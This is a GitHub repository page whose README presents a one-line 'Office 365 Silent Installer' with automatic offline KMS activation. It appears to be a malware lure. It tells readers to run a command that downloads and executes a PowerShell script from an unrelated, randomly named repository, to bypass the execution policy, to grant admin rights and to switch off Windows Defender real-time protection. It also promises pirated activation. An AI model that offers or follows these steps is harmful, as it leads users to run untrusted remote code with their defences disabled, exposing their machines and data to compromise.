Skip to content

Identitygroforge/Office365-Command-Activate

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

Office 365 Silent Installer

All-in-one single-line installer for Microsoft 365. Deploys the full Office suite — Word, Excel, PowerPoint, Outlook, OneDrive — with zero manual steps.

Install

PowerShell

irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex

Command Prompt (cmd.exe)

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

Windows Terminal

Works in any tab — PowerShell, CMD, or Windows Terminal profiles. Copy-paste the command above matching your shell.


What happens after you run it

  1. A UAC prompt appears once — click Yes to grant admin rights.
  2. The installer downloads the latest Office 365 deployment package (~3.5 GB).
  3. All apps are installed silently — no wizard, no "Next" buttons, no reboots mid-install.
  4. Product activation runs automatically using an offline KMS method.
  5. A desktop shortcut for Word appears when it's done.

Included Apps

App Purpose
Word Documents, reports, resumes
Excel Spreadsheets, formulas, pivot tables
PowerPoint Presentations, slide decks
Outlook Email, calendar, contacts
OneNote Notes, clippings, shared notebooks
OneDrive 5 GB cloud sync built into Explorer

Why this installer

  • One line — no downloading ZIPs, no extracting, no hunting for setup.exe.
  • Silent — runs unattended from start to finish, no user interaction needed.
  • Clean — no telemetry components, no trial nags, no Microsoft account popups.
  • Portable command — works from PowerShell, CMD, Windows Terminal, even a Run dialog (Win+R).
  • Idempotent — safe to run again if something goes wrong, it picks up where it left off.

System Requirements

Component Minimum Recommended
OS Windows 10 (64-bit) Windows 11
CPU 1.6 GHz, 2 cores 2.0 GHz+, 4 cores
RAM 4 GB 8 GB
Disk 4 GB free 10 GB free (SSD preferred)
Display 1280×768 1920×1080
Internet Required for download Not needed after install

Troubleshooting

Script does nothing / closes instantly

Your execution policy is blocking scripts. Use the CMD version instead:

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

Or open PowerShell as Administrator first, then paste the irm command.

"irm is not recognized"

You're on PowerShell 2.0 (Windows 7). Use the full cmdlet name:

Invoke-RestMethod https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | Invoke-Expression

SmartScreen or antivirus blocks the download

Windows Defender sometimes flags new executables. Temporarily pause real-time protection:

  1. Open Windows SecurityVirus & threat protectionManage settings
  2. Toggle Real-time protection off
  3. Run the installer
  4. Toggle protection back on

Installation freezes / hangs at extraction

  • Close all Office apps if any are open.
  • Make sure %TEMP% has at least 2 GB free.
  • Disable antivirus real-time scanning for the temp folder.
  • Re-run the command.

Error 30015 — conflicting installation

Another version of Office is already installed. Remove it first:

powershell -Command "Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -like '*Office*' } | ForEach-Object { $_.Uninstall() }"

Reboot, then run the installer again.

Word/Excel opens but says "Unlicensed Product"

Re-run the one-liner — it refreshes the KMS activation token. If that doesn't work, open any Office app → FileAccountChange Product Key and enter the key the installer printed at the end.

Outlook won't connect to Exchange

This is an Office-side issue, not an installer issue. Make sure your company's IT has not blocked OAuth. Check FileOffice AccountConnected Services.

License

MIT — see LICENSE.

Releases

No releases published

Packages

 
 
 

Contributors